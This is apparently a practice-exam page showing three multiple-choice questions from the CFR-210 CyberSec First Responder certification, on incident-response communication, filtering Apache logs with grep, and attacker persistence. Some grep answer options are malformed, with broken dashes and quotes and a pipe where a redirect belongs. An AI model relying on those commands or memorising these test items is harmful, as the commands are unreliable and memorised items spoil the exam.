CFR-210 – CyberSec First Responder

Loading demo links...

Showing 7–9 of 10 questions

Question 7

During an annual penetration test, several rootkit-enabled systems are found to be exfiltrating data. The penetration test team and the internal incident response team work to begin cleanup. The company’s operations team offers a new emails server to use for communications during the incident. As cleanup continues, the attackers seem to know exactly what the incident response plan is. Which of the following will prevent the attackers from compromising cleanup activities?

Select an option, then click Submit answer.

○
Check the DNS server for rootkits placed by the attackers.
○
Disconnect the Internet router until all systems can be checked and cleaned.
○
Use out-of-band communication until the end of the incident.
○
Disconnect the old emails server until they can be checked and cleaned.

Question 8

A DMZ web server has been compromised. During the log review, the incident responder wants to parse all common internal Class A addresses from the log. Which of the following commands should the responder use to accomplish this?

Select an option, then click Submit answer.

○
grep –x”(10.[0-9]+.[0-9]+.[0-9]+)” etc/rc.d/apache2/access.log | output.txt
○
grep –x”(192.168.[0.9]+[0-9])” bin/apache2/access.log | output.txt
○
grep –v”(10.[0-9]+.[0-9]+.[0-9]+)” /var/log/apache2/access.log > output.txt
○
grep –v”(192.168.[0.9]+[0-9]+)” /var/log/apache2/access.log > output.txt

Question 9

A malicious attacker has compromised a database by implementing a Python-based script that will automatically establish an SSH connection daily between the hours of 2:00 am and 5:00 am. Which of the following is the MOST common motive for the attack vector that was used?

Select an option, then click Submit answer.

○
Pivoting
○
Persistence/maintaining access
○
Exfiltration
○
Lateral movement

← Prev 1 2 3 4 Next →

Page 3 of 4

Sale Ends In

2h 0m 0s